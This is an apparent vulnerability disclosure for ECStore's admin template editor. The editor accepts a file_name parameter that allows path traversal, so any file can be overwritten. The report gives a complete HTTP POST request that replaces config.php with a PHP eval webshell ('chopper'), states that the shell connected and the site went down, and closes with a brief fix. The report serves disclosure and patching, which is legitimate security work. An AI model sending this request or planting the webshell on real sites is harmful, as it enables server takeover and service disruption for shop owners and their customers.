ECStore open-source online shop system Arbitrary File Modification Vulnerability can be shell

ECStore open-source online shop system Arbitrary File Modification Vulnerability can be shell

Brief description:

The file editing function in template editing does not have strict restrictions on editable files. As a result, any files in the system can be modified.

Select the file to be modified in the file editing function. Select the image here (the template file can also be used). Then, when uploading the image, set the file_name parameter to any PHP file on the website, such as/index. php or/config. php, set the image content to shell content ....

The post data is as follows:
 

POST /index.php/shopadmin/index.php?app=site&ctl=admin_explorer_theme&act=save_image HTTP/1.1Host: shop.xxx.comContent-Length: 846527Cache-Control: max-age=0Accept-Encoding: gzip,deflateAccept-Language: zh-CN,zh;q=0.8,en;q=0.6Cookie: xxxxxxxxx------WebKitFormBoundaryHSNjVhgvrpnTmmQDContent-Disposition: form-data; name="theme"ecstore------WebKitFormBoundaryHSNjVhgvrpnTmmQDContent-Disposition: form-data; name="open_path"------WebKitFormBoundaryHSNjVhgvrpnTmmQDContent-Disposition: form-data; name="file_name"../../config/config.php------WebKitFormBoundaryHSNjVhgvrpnTmmQDContent-Disposition: form-data; name="upfile"; filename="Desert.jpg"Content-Type: image/jpeg<?php @eval($_POST['chopper']);?>------WebKitFormBoundaryHSNjVhgvrpnTmmQDContent-Disposition: form-data; name="has_bak"1------WebKitFormBoundaryHSNjVhgvrpnTmmQD--

This problem also exists when editing html or xml files.

Webshell connection successful

Shell is obtained. After the config file is modified, the website is suspended .....

Solution:

Restrict the file_name parameter value. Do not modify files other than the template directory.